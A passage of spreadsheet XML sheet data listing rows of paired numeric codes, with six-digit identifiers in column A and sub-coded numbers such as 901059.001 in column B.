        <v>500104</v>
      </c>
      <c r="B2143" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="2144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2144" s="5">
        <v>500104</v>
      </c>
      <c r="B2144" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="2145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2145" s="5">
        <v>500104</v>
      </c>
      <c r="B2145" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2146" s="5">
        <v>500104</v>
      </c>
      <c r="B2146" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="2147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2147" s="5">
        <v>500104</v>
      </c>
      <c r="B2147" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2148" s="5">
        <v>500121</v>
      </c>
      <c r="B2148" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2149" s="5">
        <v>500121</v>
      </c>
      <c r="B2149" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="2150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2150" s="5">
        <v>500121</v>
      </c>
      <c r="B2150" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="2151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2151" s="5">
        <v>500121</v>
      </c>
      <c r="B2151" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2152" s="5">
        <v>500121</v>
      </c>
      <c r="B2152" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2153" s="5">
        <v>500121</v>
      </c>
      <c r="B2153" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2154" s="5">
        <v>500121</v>
      </c>
      <c r="B2154" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="2155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2155" s="5">
        <v>500121</v>
      </c>
      <c r="B2155" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="2156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2156" s="5">
        <v>500121</v>
      </c>
      <c r="B2156" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2157" s="5">
        <v>500121</v>
      </c>
      <c r="B2157" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="2158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2158" s="5">
        <v>500121</v>
      </c>
      <c r="B2158" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="2159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2159" s="5">
        <v>500121</v>
      </c>
      <c r="B2159" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2160" s="5">
        <v>500121</v>
      </c>
      <c r="B2160" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="2161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2161" s="5">
        <v>500121</v>
      </c>
      <c r="B2161" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2162" s="5">
        <v>500121</v>
      </c>
      <c r="B2162" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2163" s="5">
        <v>500121</v>
      </c>
      <c r="B2163" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2164" s="5">
        <v>500121</v>
      </c>
      <c r="B2164" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="2165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2165" s="5">
        <v>500121</v>
      </c>
      <c r="B2165" s="3">
        <v>901598.00199999998</v>
      </c>
    </row>
    <row r="2166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2166" s="5">
        <v>500121</v>
      </c>
      <c r="B2166" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="2167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2167" s="5">
        <v>500121</v>
      </c>
      <c r="B2167" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2168" s="5">
        <v>500121</v>
      </c>
      <c r="B2168" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="2169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2169" s="5">
        <v>500121</v>
      </c>
      <c r="B2169" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="2170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2170" s="5">
        <v>500121</v>
      </c>
      <c r="B2170" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2171" s="5">
        <v>500121</v>
      </c>
      <c r="B2171" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2172" s="5">
        <v>500121</v>
      </c>
      <c r="B2172" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2173" s="5">
        <v>500121</v>
      </c>
      <c r="B2173" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="2174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2174" s="5">
        <v>500121</v>
      </c>
      <c r="B2174" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="2175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2175" s="5">
        <v>500121</v>
      </c>
      <c r="B2175" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="2176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2176" s="5">
        <v>500121</v>
      </c>
      <c r="B2176" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2177" s="5">
        <v>500091</v>
      </c>
      <c r="B2177" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2178" s="5">
        <v>500091</v>
      </c>
      <c r="B2178" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2179" s="5">
        <v>500091</v>
      </c>
      <c r="B2179" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2180" s="5">
        <v>500091</v>
      </c>
      <c r="B2180" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2181" s="5">
        <v>500091</v>
      </c>
      <c r="B2181" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="2182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2182" s="5">
        <v>500091</v>
      </c>
      <c r="B2182" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2183" s="5">
        <v>500091</v>
      </c>
      <c r="B2183" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2184" s="5">
        <v>500091</v>
      </c>
      <c r="B2184" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2185" s="5">
        <v>500091</v>
      </c>
      <c r="B2185" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="2186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2186" s="5">
        <v>500091</v>
      </c>
      <c r="B2186" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="2187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2187" s="5">
        <v>500091</v>
      </c>
      <c r="B2187" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="2188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2188" s="5">
        <v>500091</v>
      </c>
      <c r="B2188" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2189" s="5">
        <v>500091</v>
      </c>
      <c r="B2189" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2190" s="5">
        <v>500091</v>
      </c>
      <c r="B2190" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="2191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2191" s="5">
        <v>500091</v>
      </c>
      <c r="B2191" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2192" s="5">
        <v>500091</v>
      </c>
      <c r="B2192" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="2193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2193" s="5">
        <v>500091</v>
      </c>
      <c r="B2193" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="2194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2194" s="5">
        <v>500091</v>
      </c>
      <c r="B2194" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="2195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2195" s="5">
        <v>500091</v>
      </c>
      <c r="B2195" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="2196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2196" s="5">
        <v>500091</v>
      </c>
      <c r="B2196" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="2197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2197" s="5">
        <v>500091</v>
      </c>
      <c r="B2197" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="2198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2198" s="5">
        <v>500091</v>
      </c>
      <c r="B2198" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="2199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2199" s="5">
        <v>500091</v>
      </c>
      <c r="B2199" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="2200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2200" s="5">
        <v>500091</v>
      </c>
      <c r="B2200" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="2201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2201" s="5">
        <v>500091</v>
      </c>
      <c r="B2201" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="2202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2202" s="5">
        <v>500091</v>
      </c>
      <c r="B2202" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2203" s="5">
        <v>500091</v>
      </c>
      <c r="B2203" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="2204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2204" s="5">
        <v>500091</v>
      </c>
      <c r="B2204" s="3">
        <v>901125</v>
      </c>
    </row>
    <row r="2205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2205" s="5">
        <v>500122</v>
      </c>
      <c r="B2205" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="2206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2206" s="5">
        <v>500122</v>
      </c>
      <c r="B2206" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="2207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2207" s="5">
        <v>500122</v>
      </c>
      <c r="B2207" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="2208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2208" s="5">
        <v>500122</v>
      </c>
      <c r="B2208" s="3">
        <v>901114.00300000003</v>
      </c>
    </row>
    <row r="2209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2209" s="5">
        <v>500122</v>
      </c>
      <c r="B2209" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="2210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2210" s="5">
        <v>500122</v>
      </c>
      <c r="B2210" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="2211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2211" s="5">
        <v>500122</v>
      </c>
      <c r="B2211" s="3">
        <v>901589.00300000003</v>
      </c>
    </row>
    <row r="2212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2212" s="5">
        <v>500122</v>
      </c>
      <c r="B2212" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2213" s="5">
        <v>500122</v>
      </c>
      <c r="B2213" s="3">
        <v>901588.00399999996</v>
      </c>
    </row>
    <row r="2214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2214" s="5">
        <v>500122</v>
      </c>
      <c r="B2214" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="2215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2215" s="5">
        <v>500122</v>
      </c>
      <c r="B2215" s="3">
        <v>901594</v>
      </c>
    </row>
    <row r="2216" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2216" s="5">
        <v>500122</v>
      </c>
      <c r="B2216" s="3">
        <v>901608.005</v>
      </c>
    </row>
    <row r="2217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2217" s="5">
        <v>500122</v>
      </c>
      <c r="B2217" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="2218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2218" s="5">
        <v>500083</v>
      </c>
      <c r="B2218" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2219" s="5">
        <v>500083</v>
      </c>
      <c r="B2219" s="3">
        <v>901071.00199999998</v>
      </c>
    </row>
    <row r="2220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2220" s="5">
        <v>500083</v>
      </c>
      <c r="B2220" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="2221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2221" s="5">
        <v>500054</v>
      </c>
      <c r="B2221" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="2222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2222" s="5">
        <v>500054</v>
      </c>
      <c r="B2222" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2223" s="5">
        <v>500054</v>
      </c>
      <c r="B2223" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="2224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2224" s="5">
        <v>500054</v>
      </c>
      <c r="B2224" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="2225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2225" s="5">
        <v>500054</v>
      </c>
      <c r="B2225" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="2226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2226" s="5">
        <v>500054</v>
      </c>
      <c r="B2226" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2227" s="5">
        <v>500054</v>
      </c>
      <c r="B2227" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="2228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2228" s="5">
        <v>500054</v>
      </c>
      <c r="B2228" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="2229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2229" s="5">
        <v>500054</v>
      </c>
      <c r="B2229" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2230" s="5">
        <v>500038</v>
      </c>
      <c r="B2230" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2231" s="5">
        <v>500038</v>
      </c>
      <c r="B2231" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="2232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2232" s="5">
        <v>500038</v>
      </c>
      <c r="B2232" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2233" s="5">
        <v>500038</v>
      </c>
      <c r="B2233" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="2234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2234" s="5">
        <v>500038</v>
      </c>
      <c r="B2234" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="2235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2235" s="5">
        <v>500038</v>
      </c>
      <c r="B2235" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="2236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2236" s="5">
        <v>500038</v>
      </c>
      <c r="B2236" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="2237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2237" s="5">
        <v>500038</v>
      </c>
      <c r="B2237" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="2238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2238" s="5">
        <v>500038</v>
      </c>
      <c r="B2238" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="2239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2239" s="5">
        <v>500038</v>
      </c>
      <c r="B2239" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2240" s="5">
        <v>500038</v>
      </c>
      <c r="B2240" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="2241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2241" s="5">
        <v>500038</v>
      </c>
      <c r="B2241" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="2242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2242" s="5">
        <v>500038</v>
      </c>
      <c r="B2242" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2243" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2243" s="5">
        <v>500038</v>
      </c>
      <c r="B2243" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2244" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2244" s="5">
        <v>500038</v>
      </c>
      <c r="B2244" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="2245" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2245" s="5">
        <v>500038</v>
      </c>
      <c r="B2245" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="2246" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2246" s="5">
        <v>500041</v>
      </c>
      <c r="B2246" s="3">
        <v>901564.005</v>
      </c>
    </row>
    <row r="2247" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2247" s="5">
        <v>500041</v>
      </c>
      <c r="B2247" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="2248" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2248" s="5">
        <v>500041</v>
      </c>
      <c r="B2248" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="2249" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2249" s="5">
        <v>500039</v>
      </c>
      <c r="B2249" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2250" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2250" s="5">
        <v>500039</v>
      </c>
      <c r="B2250" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="2251" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2251" s="5">
        <v>500039</v>
      </c>
      <c r="B2251" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="2252" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2252" s="5">
        <v>500039</v>
      </c>
      <c r="B2252" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="2253" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2253" s="5">
        <v>500039</v>
      </c>
      <c r="B2253" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="2254" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2254" s="5">
        <v>500062</v>
      </c>
      <c r="B2254" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2255" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2255" s="5">
        <v>500062</v>
      </c>
      <c r="B2255" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2256" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2256" s="5">
        <v>500062</v>
      </c>
      <c r="B2256" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2257" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2257" s="5">
        <v>500062</v>
      </c>
      <c r="B2257" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2258" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2258" s="5">
        <v>500062</v>
      </c>
      <c r="B2258" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2259" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2259" s="5">
        <v>500092</v>
      </c>
      <c r="B2259" s="3">
        <v>901087.00300000003</v>
      </c>
    </row>
    <row r="2260" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2260" s="5">
        <v>500092</v>
      </c>
      <c r="B2260" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2261" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2261" s="5">
        <v>500092</v>
      </c>
      <c r="B2261" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2262" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2262" s="5">
        <v>500092</v>
      </c>
      <c r="B2262" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2263" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2263" s="5">
        <v>500092</v>
      </c>
      <c r="B2263" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2264" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2264" s="5">
        <v>500092</v>
      </c>
      <c r="B2264" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="2265" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2265" s="5">
        <v>500092</v>
      </c>
      <c r="B2265" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="2266" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2266" s="5">
        <v>500092</v>
      </c>
      <c r="B2266" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="2267" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2267" s="5">
        <v>500092</v>
      </c>
      <c r="B2267" s="3">
        <v>901568.00100000005</v>
      </c>
    </row>
    <row r="2268" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2268" s="5">
        <v>500092</v>
      </c>
      <c r="B2268" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2269" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2269" s="5">
        <v>500092</v>
      </c>
      <c r="B2269" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="2270" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2270" s="5">
        <v>500092</v>
      </c>
      <c r="B2270" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2271" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2271" s="5">
        <v>500092</v>
      </c>
      <c r="B2271" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="2272" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2272" s="5">
        <v>500092</v>
      </c>
      <c r="B2272" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="2273" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2273" s="5">
        <v>500092</v>
      </c>
      <c r="B2273" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2274" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2274" s="5">
        <v>500092</v>
      </c>
      <c r="B2274" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="2275" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2275" s="5">
        <v>500092</v>
      </c>
      <c r="B2275" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="2276" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2276" s="5">
        <v>500092</v>
      </c>
      <c r="B2276" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="2277" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2277" s="5">
        <v>500092</v>
      </c>
      <c r="B2277" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="2278" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2278" s="5">
        <v>500092</v>
      </c>
      <c r="B2278" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="2279" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2279" s="5">
        <v>500092</v>
      </c>
      <c r="B2279" s="3">
        <v>901553.005</v>
      </c>
    </row>
    <row r="2280" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2280" s="5">
        <v>500092</v>
      </c>
      <c r="B2280" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="2281" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2281" s="5">
        <v>500092</v>
      </c>
      <c r="B2281" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="2282" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2282" s="5">
        <v>500092</v>
      </c>
      <c r="B2282" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2283" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2283" s="5">
        <v>500092</v>
      </c>
      <c r="B2283" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="2284" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2284" s="5">
        <v>500127</v>
      </c>
      <c r="B2284" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2285" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2285" s="5">
        <v>500127</v>
      </c>
      <c r="B2285" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2286" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2286" s="5">
        <v>500127</v>
      </c>
      <c r="B2286" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="2287" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2287" s="5">
        <v>500127</v>
      </c>
      <c r="B2287" s="3">
        <v>901568.00199999998</v>
      </c>
    </row>
    <row r="2288" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2288" s="5">
        <v>500127</v>
      </c>
      <c r="B2288" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="2289" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2289" s="5">
        <v>500127</v>
      </c>
      <c r="B2289" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2290" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2290" s="5">
        <v>500127</v>
      </c>
      <c r="B2290" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="2291" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2291" s="5">
        <v>500127</v>
      </c>
      <c r="B2291" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2292" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2292" s="5">
        <v>500127</v>
      </c>
      <c r="B2292" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="2293" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2293" s="5">
        <v>500127</v>
      </c>
      <c r="B2293" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2294" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2294" s="5">
        <v>500127</v>
      </c>
      <c r="B2294" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="2295" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2295" s="5">
        <v>500127</v>
      </c>
      <c r="B2295" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="2296" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2296" s="5">
        <v>500127</v>
      </c>
      <c r="B2296" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="2297" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2297" s="5">
        <v>500127</v>
      </c>
      <c r="B2297" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
